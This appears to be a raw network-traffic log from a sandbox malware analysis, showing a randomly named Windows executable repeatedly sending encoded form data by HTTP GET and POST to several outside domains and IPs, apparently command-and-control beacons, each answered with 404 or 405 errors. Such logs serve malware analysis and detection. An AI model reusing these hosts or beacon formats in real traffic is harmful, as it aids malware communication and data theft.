                                            Data Raw: 5a 36 5a 54 47 3d 41 48 68 76 32 35 6f 4b 6d 32 74 71 38 46 49 32 63 34 4e 6c 64 2b 77 78 53 44 38 2f 6c 43 78 41 78 61 4e 55 44 68 63 4d 70 45 71 43 36 49 59 73 30 50 31 6c 34 55 77 42 38 49 30 4a 38 4e 35 4c 33 55 73 64 52 38 58 49 47 35 67 61 41 6e 72 74 4a 4a 37 51 6f 6b 54 2f 49 73 51 49 73 35 72 36 77 6f 48 74 49 78 43 66 4d 44 73 41 38 50 4e 63 4d 32 50 4d 2b 36 4e 67 74 30 32 78 61 72 62 54 62 56 41 47 70 74 47 56 53 36 45 48 58 41 54 32 32 38 66 47 53 62 74 6c 2f 54 43 6f 72 4c 57 67 33 6e 6f 69 57 2b 36 75 66 6f 66 76 70 52 37 4f 6a 78 43 65 6f 67 39 35 4e 62 50 4e 4b 6b 6c 45 37 45 71 6d 61 5a 59 52 30 51 56 5a 59 37 4a 6a 47 45 4a 2f 46 52 79 33 45 41 36 67 31 70 38 69 2b 67 78 75 32 46 61 6d 31 4a 5a 78 30 77 54 6b 32 68 70 2b 79 59 33 77 45 2b 76 48 46 6a 35 43 4e 6d 6e 4e 6d 70 4a 44 65 30 45 6e 66 48 2f 31 6f 4b 48 73 68 4c 59 48 75 6d 35 68 61 73 42 2f 55 6c 6c 41 30 38 66 45 53 55 68 78 75 39 4a 6f 70 65 2f 73 68 51 48 65 6f 53 31 75 4d 47 75 4e 70 37 64 37 6e 79 6a 66 41 2b 57 46 [TRUNCATED]
                                            Data Ascii: Z6ZTG=AHhv25oKm2tq8FI2c4Nld+wxSD8/lCxAxaNUDhcMpEqC6IYs0P1l4UwB8I0J8N5L3UsdR8XIG5gaAnrtJJ7QokT/IsQIs5r6woHtIxCfMDsA8PNcM2PM+6Ngt02xarbTbVAGptGVS6EHXAT228fGSbtl/TCorLWg3noiW+6ufofvpR7OjxCeog95NbPNKklE7EqmaZYR0QVZY7JjGEJ/FRy3EA6g1p8i+gxu2Fam1JZx0wTk2hp+yY3wE+vHFj5CNmnNmpJDe0EnfH/1oKHshLYHum5hasB/UllA08fESUhxu9Jope/shQHeoS1uMGuNp7d7nyjfA+WFZrPzQ7ElV9oE1Okg2zpwJQG74+8TYQrB6/ADUlzucQiGjqnwAzaNzC2z2rJMP2qNpcezJpMN1GtERSZNtB9PrFzlAHwIE5daVOvgwLYAyAuoiPI3s3O6lAQAEq0ag/OUXuAroAY3yEIEv9gim3XX2V7jMzD+Y5LXSH6V8jtS1ig9h52sOd86ZsZEwIsnHpo11+FEOQTi9z4t83RgeJvAiCxgb44zRxu+AxPepKanA54Nc1nsGOzzJBJP2fC+ERgVpVGi0NZ9SpOYWFZ3kbt8YA2AZ8OGwkUHjj228cmE7YlONqTL2gvA3SWLOhL9laZ+SC/Fx70bLaAmKBMAKSce08Eun6aL17kSAm5tIlNl957zAO3jarTv9a04h3IarixBlNmLnPSdZLSbssAE2O/1mEbbx8eCXV3KVZAKNTouuqbXa0sz6C28pmtID9TI2yrGxb+tjtnj3SLZtKRZmJyZ++wU4sIMylYcydrPoSDMgNpSeoTy2GZBRORnGCzEY8FiHOkD4i3bJZjBhOn6WCw/VdOMOMoCAZSILPdpd/IRsvMaFM9PYWQhdt1HxbtNBQhbvh9TrToArUUYng92dWlK9QkWpMKVBmbCyGzgpGN/xwytBf0x88gZv8phbT2vOpFdt6HrNjmcO3zc+G/2cC01uRzshhlMnZeLE6 [TRUNCATED]
                                            Jul 3, 2024 18:53:19.942409039 CEST367INHTTP/1.1 404 Not Found
                                            Date: Wed, 03 Jul 2024 16:53:19 GMT
                                            Server: Apache
                                            Content-Length: 203
                                            Connection: close
                                            Content-Type: text/html; charset=iso-8859-1
                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 68 66 6d 6d 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /hfmm/ was not found on this server.</p></body></html>


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            12192.168.2.64973681.88.57.70805680C:\Program Files (x86)\NXLBzGBJZEKXLSDXbGEARvNAbdTqqXUHbIINICYaWMGxMje\NwXvnHITawmpBkkZKEXJ.exe
                                            TimestampBytes transferredDirectionData
                                            Jul 3, 2024 18:53:21.807485104 CEST478OUTGET /hfmm/?Z6ZTG=NFJP1MENpWop4mQ2Zs5LCbA0YH8E+xFn0ZZfcGEEhmCw8vkYycZHoGwi7KU1tu5K8k8nV/m8HY5DGkDycaipo03uFrN3sKGd/4X9PAy/KU8mrpcfTGbb4advs0SPZoPYPk8rppw=&3pSl=bXiTJHhxyN HTTP/1.1
                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                            Accept-Language: en-US,en;q=0.9
                                            Host: www.videos60.com
                                            Connection: close
                                            User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
                                            Jul 3, 2024 18:53:22.644169092 CEST367INHTTP/1.1 404 Not Found
                                            Date: Wed, 03 Jul 2024 16:53:22 GMT
                                            Server: Apache
                                            Content-Length: 203
                                            Connection: close
                                            Content-Type: text/html; charset=iso-8859-1
                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 68 66 6d 6d 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /hfmm/ was not found on this server.</p></body></html>


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            13192.168.2.649737203.161.49.220805680C:\Program Files (x86)\NXLBzGBJZEKXLSDXbGEARvNAbdTqqXUHbIINICYaWMGxMje\NwXvnHITawmpBkkZKEXJ.exe
                                            TimestampBytes transferredDirectionData
                                            Jul 3, 2024 18:53:27.820875883 CEST736OUTPOST /ei4t/ HTTP/1.1
                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                            Accept-Language: en-US,en;q=0.9
                                            Accept-Encoding: gzip, deflate
                                            Host: www.vertilehub.xyz
                                            Origin: http://www.vertilehub.xyz
                                            Connection: close
                                            Content-Type: application/x-www-form-urlencoded
                                            Cache-Control: no-cache
                                            Content-Length: 210
                                            Referer: http://www.vertilehub.xyz/ei4t/
                                            User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
                                            Data Raw: 5a 36 5a 54 47 3d 69 4c 69 65 53 49 46 5a 30 48 78 65 62 34 38 55 6d 62 71 46 4b 6b 51 69 57 56 67 33 4f 6b 59 72 32 53 66 63 46 53 73 6e 33 6c 79 58 6b 36 73 38 2b 41 39 48 41 71 36 52 6c 5a 6a 4e 61 6f 67 6f 4f 34 34 76 66 43 79 6b 62 6d 39 65 52 4f 4c 41 53 36 56 55 38 43 58 35 41 33 35 34 37 38 57 73 48 37 30 6c 30 57 76 7a 61 70 35 42 52 4b 45 53 4c 37 2f 38 35 5a 37 72 71 6e 6c 73 4f 78 34 79 34 6b 71 5a 5a 72 51 67 45 6b 68 51 73 4d 78 72 4a 50 56 64 64 42 39 70 75 33 31 76 56 31 71 62 70 39 4b 34 51 50 62 74 57 79 71 75 70 41 71 54 34 39 43 73 37 67 2b 4f 44 55 4c 35 45 57 2f 43 43 76 61 56 38 4f 54 31 43 39 53 6d
                                            Data Ascii: Z6ZTG=iLieSIFZ0Hxeb48UmbqFKkQiWVg3OkYr2SfcFSsn3lyXk6s8+A9HAq6RlZjNaogoO44vfCykbm9eROLAS6VU8CX5A35478WsH70l0Wvzap5BRKESL7/85Z7rqnlsOx4y4kqZZrQgEkhQsMxrJPVddB9pu31vV1qbp9K4QPbtWyqupAqT49Cs7g+ODUL5EW/CCvaV8OT1C9Sm
                                            Jul 3, 2024 18:53:28.443382025 CEST533INHTTP/1.1 404 Not Found
                                            Date: Wed, 03 Jul 2024 16:53:28 GMT
                                            Server: Apache
                                            Content-Length: 389
                                            Connection: close
                                            Content-Type: text/html
                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                            Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            14192.168.2.649738203.161.49.220805680C:\Program Files (x86)\NXLBzGBJZEKXLSDXbGEARvNAbdTqqXUHbIINICYaWMGxMje\NwXvnHITawmpBkkZKEXJ.exe
                                            TimestampBytes transferredDirectionData
                                            Jul 3, 2024 18:53:30.354630947 CEST760OUTPOST /ei4t/ HTTP/1.1
                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                            Accept-Language: en-US,en;q=0.9
                                            Accept-Encoding: gzip, deflate
                                            Host: www.vertilehub.xyz
                                            Origin: http://www.vertilehub.xyz
                                            Connection: close
                                            Content-Type: application/x-www-form-urlencoded
                                            Cache-Control: no-cache
                                            Content-Length: 234
                                            Referer: http://www.vertilehub.xyz/ei4t/
                                            User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
                                            Data Raw: 5a 36 5a 54 47 3d 69 4c 69 65 53 49 46 5a 30 48 78 65 55 34 4d 55 67 49 43 46 4d 45 51 68 59 31 67 33 5a 30 59 52 32 53 62 63 46 54 59 33 30 57 57 58 6b 66 6f 38 39 42 39 48 42 71 36 52 75 35 69 48 55 49 67 7a 4f 2f 78 59 66 43 2b 6b 62 6c 42 65 52 50 62 41 53 71 70 56 74 43 58 42 4d 58 35 2b 6b 73 57 73 48 37 30 6c 30 57 72 56 61 70 42 42 52 62 30 53 4b 5a 62 2f 6d 70 37 6f 70 6e 6c 73 4b 78 34 70 34 6b 72 4d 5a 70 30 61 45 6d 5a 51 73 4e 42 72 48 37 4a 53 53 42 39 76 78 48 30 49 47 6c 72 68 68 39 37 61 57 70 62 51 48 51 75 70 6c 57 72 4a 6b 4f 43 50 70 77 65 4d 44 57 54 4c 45 32 2f 6f 41 76 69 56 75 5a 66 53 4e 4a 33 46 50 63 6d 48 44 54 59 67 59 38 4d 69 51 58 72 5a 4a 2f 68 35 76 51 3d 3d
                                            Data Ascii: Z6ZTG=iLieSIFZ0HxeU4MUgICFMEQhY1g3Z0YR2SbcFTY30WWXkfo89B9HBq6Ru5iHUIgzO/xYfC+kblBeRPbASqpVtCXBMX5+ksWsH70l0WrVapBBRb0SKZb/mp7opnlsKx4p4krMZp0aEmZQsNBrH7JSSB9vxH0IGlrhh97aWpbQHQuplWrJkOCPpweMDWTLE2/oAviVuZfSNJ3FPcmHDTYgY8MiQXrZJ/h5vQ==
                                            Jul 3, 2024 18:53:31.023020029 CEST533INHTTP/1.1 404 Not Found
                                            Date: Wed, 03 Jul 2024 16:53:30 GMT
                                            Server: Apache
                                            Content-Length: 389
                                            Connection: close
                                            Content-Type: text/html
                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                            Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            15192.168.2.649739203.161.49.220805680C:\Program Files (x86)\NXLBzGBJZEKXLSDXbGEARvNAbdTqqXUHbIINICYaWMGxMje\NwXvnHITawmpBkkZKEXJ.exe
                                            TimestampBytes transferredDirectionData
                                            Jul 3, 2024 18:53:32.885875940 CEST1773OUTPOST /ei4t/ HTTP/1.1
                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                            Accept-Language: en-US,en;q=0.9
                                            Accept-Encoding: gzip, deflate
                                            Host: www.vertilehub.xyz
                                            Origin: http://www.vertilehub.xyz
                                            Connection: close
                                            Content-Type: application/x-www-form-urlencoded
                                            Cache-Control: no-cache
                                            Content-Length: 1246
                                            Referer: http://www.vertilehub.xyz/ei4t/
                                            User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
                                            Data Raw: 5a 36 5a 54 47 3d 69 4c 69 65 53 49 46 5a 30 48 78 65 55 34 4d 55 67 49 43 46 4d 45 51 68 59 31 67 33 5a 30 59 52 32 53 62 63 46 54 59 33 30 57 65 58 6b 74 67 38 2b 69 56 48 43 71 36 52 6e 5a 69 4b 55 49 68 68 4f 35 5a 55 66 43 44 54 62 6a 4e 65 4c 6f 62 41 47 49 4e 56 6b 43 58 42 52 6e 35 37 37 38 57 44 48 37 6b 68 30 58 62 56 61 70 42 42 52 5a 73 53 44 72 2f 2f 31 35 37 72 71 6e 6c 67 4f 78 35 47 34 6e 61 33 5a 70 68 74 46 57 35 51 76 74 52 72 4c 6f 68 53 62 42 39 58 79 48 30 51 47 6c 6e 45 68 2b 50 38 57 70 48 36 48 51 71 70 6e 43 79 42 67 2b 7a 4a 30 78 6d 36 41 58 6e 4b 50 77 2f 34 61 64 2f 73 75 4a 62 6b 4e 4b 33 51 4c 34 2b 6e 47 53 56 44 4e 74 41 64 63 53 72 58 44 4f 77 41 78 2f 79 62 67 52 6f 72 43 4b 34 4b 6c 41 61 79 43 36 76 71 66 53 52 37 4e 73 58 62 6a 6f 44 6b 6a 46 4e 4d 37 2b 46 4b 42 61 76 65 68 52 6c 50 4b 6b 72 4d 6f 65 69 68 37 56 76 45 4d 36 32 30 74 7a 75 79 71 76 74 78 4e 73 73 48 71 39 74 77 36 41 63 5a 44 6e 51 50 71 4d 33 6d 50 59 77 33 7a 36 47 73 6c 45 46 61 58 4c 35 35 [TRUNCATED]
                                            Data Ascii: Z6ZTG=iLieSIFZ0HxeU4MUgICFMEQhY1g3Z0YR2SbcFTY30WeXktg8+iVHCq6RnZiKUIhhO5ZUfCDTbjNeLobAGINVkCXBRn5778WDH7kh0XbVapBBRZsSDr//157rqnlgOx5G4na3ZphtFW5QvtRrLohSbB9XyH0QGlnEh+P8WpH6HQqpnCyBg+zJ0xm6AXnKPw/4ad/suJbkNK3QL4+nGSVDNtAdcSrXDOwAx/ybgRorCK4KlAayC6vqfSR7NsXbjoDkjFNM7+FKBavehRlPKkrMoeih7VvEM620tzuyqvtxNssHq9tw6AcZDnQPqM3mPYw3z6GslEFaXL55c++a484STyZd7oj7DFB1aUCTDU5UGsmQ0lkvB0fVOSLqLEC+ED+qiZ52YqkEGrxSsEkxb4VGNjRsRvnGxzbfTCg1CiRJ4igqG2UvjCm5Ww6QTcnCK6bNyVuHXcSisSlYX2QyxcGDeQgBVgug5LN2w4MmQZq8WRB52tQxJgHUNK6DQtWcyvAemwStHggKckfYRu+HrqKJ4UT5Xe1MBqAUmJk6s9iUhl+5m+SMILsBM7oDvzyvoqkzt3Ng145QhOqcKVErSDqJYGbayzfrRJ+JwadEX0encd2EVbWIZxC1wyF1pXneDS8EMB8a90rNnHyiRAOX2YcXvL9lat/u7Op4lE+8b1k9b1JqMIAhV3C+n/Pto+Ap8qitk9IyTKxU8JHGcO1rp1HgTLjUygJsCTKBKt2ybpTf7VMgL7t6by5bmdfoO/MQcPobHqdXRU6G7Gp+2/RjTyB+SOjUdKOxjGPUDbtb/RkcSqAq1TldbiOaOpwy0husMHa2lEi9vxaLsx9XCg/pTgjpsjMZUwQkI7jANLhnnFO25f/OTNSxlOv1U+3P7ROFyVIMs4bbBoWTo61ebfhvsX42lwetogWjJAg0JcxVwhyL7f4D0obBGk6W/8mT0dUi67RCB0YGb+0L7oFhPvyV2U82pQwckCnOKnvcsOXWBQBPCbbWNY [TRUNCATED]
                                            Jul 3, 2024 18:53:33.485022068 CEST533INHTTP/1.1 404 Not Found
                                            Date: Wed, 03 Jul 2024 16:53:33 GMT
                                            Server: Apache
                                            Content-Length: 389
                                            Connection: close
                                            Content-Type: text/html
                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                            Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            16192.168.2.649740203.161.49.220805680C:\Program Files (x86)\NXLBzGBJZEKXLSDXbGEARvNAbdTqqXUHbIINICYaWMGxMje\NwXvnHITawmpBkkZKEXJ.exe
                                            TimestampBytes transferredDirectionData
                                            Jul 3, 2024 18:53:35.418169022 CEST480OUTGET /ei4t/?3pSl=bXiTJHhxyN&Z6ZTG=vJK+R49o60hMb5R0zuW0LjMDSBoWblw/xm7bGUo972WEnNUAqilJR4ikt7uwBrcRV8UZThTaEWZ7S+DdGKZTmgrpJBBQs9ifJOYm4nfBSZlzTv8zXZPL/ZPwonFSFx1LsUa4ZMM= HTTP/1.1
                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                            Accept-Language: en-US,en;q=0.9
                                            Host: www.vertilehub.xyz
                                            Connection: close
                                            User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
                                            Jul 3, 2024 18:53:36.031656027 CEST548INHTTP/1.1 404 Not Found
                                            Date: Wed, 03 Jul 2024 16:53:35 GMT
                                            Server: Apache
                                            Content-Length: 389
                                            Connection: close
                                            Content-Type: text/html; charset=utf-8
                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                            Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            17192.168.2.649741152.32.156.214805680C:\Program Files (x86)\NXLBzGBJZEKXLSDXbGEARvNAbdTqqXUHbIINICYaWMGxMje\NwXvnHITawmpBkkZKEXJ.exe
                                            TimestampBytes transferredDirectionData
                                            Jul 3, 2024 18:53:49.602623940 CEST730OUTPOST /wvfe/ HTTP/1.1
                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                            Accept-Language: en-US,en;q=0.9
                                            Accept-Encoding: gzip, deflate
                                            Host: www.xuzfceth.com
                                            Origin: http://www.xuzfceth.com
                                            Connection: close
                                            Content-Type: application/x-www-form-urlencoded
                                            Cache-Control: no-cache
                                            Content-Length: 210
                                            Referer: http://www.xuzfceth.com/wvfe/
                                            User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
                                            Data Raw: 5a 36 5a 54 47 3d 77 71 72 46 6f 79 73 46 55 31 68 45 33 43 35 54 71 50 6a 4a 76 58 2b 55 55 35 66 72 6a 54 66 63 32 62 6c 49 44 6f 49 75 6e 54 41 42 58 6f 75 53 52 32 71 51 44 4f 54 69 53 33 77 5a 79 30 49 62 36 63 59 75 41 48 72 4c 64 4d 36 56 4c 54 58 37 64 58 62 4d 75 46 49 77 4e 43 61 76 36 72 39 30 4e 70 44 34 72 78 32 46 39 50 6b 63 51 41 6b 52 42 4a 32 76 52 64 4b 6f 4d 35 54 57 47 79 54 59 68 77 63 7a 32 6e 4a 5a 4f 56 54 54 65 7a 71 6a 58 63 46 6a 33 55 54 4f 30 75 4a 4e 69 6e 45 6f 55 75 78 58 6c 4f 66 43 65 70 49 65 6e 31 42 6b 2f 49 67 64 78 49 73 53 45 2b 2f 57 66 6b 43 4a 44 6e 67 6d 34 39 7a 7a 6a 4a 5a 74
                                            Data Ascii: Z6ZTG=wqrFoysFU1hE3C5TqPjJvX+UU5frjTfc2blIDoIunTABXouSR2qQDOTiS3wZy0Ib6cYuAHrLdM6VLTX7dXbMuFIwNCav6r90NpD4rx2F9PkcQAkRBJ2vRdKoM5TWGyTYhwcz2nJZOVTTezqjXcFj3UTO0uJNinEoUuxXlOfCepIen1Bk/IgdxIsSE+/WfkCJDngm49zzjJZt
                                            Jul 3, 2024 18:53:50.554016113 CEST295INHTTP/1.1 405 Not Allowed
                                            Server: nginx
                                            Date: Wed, 03 Jul 2024 16:53:50 GMT
                                            Content-Type: text/html
                                            Content-Length: 150
                                            Connection: close
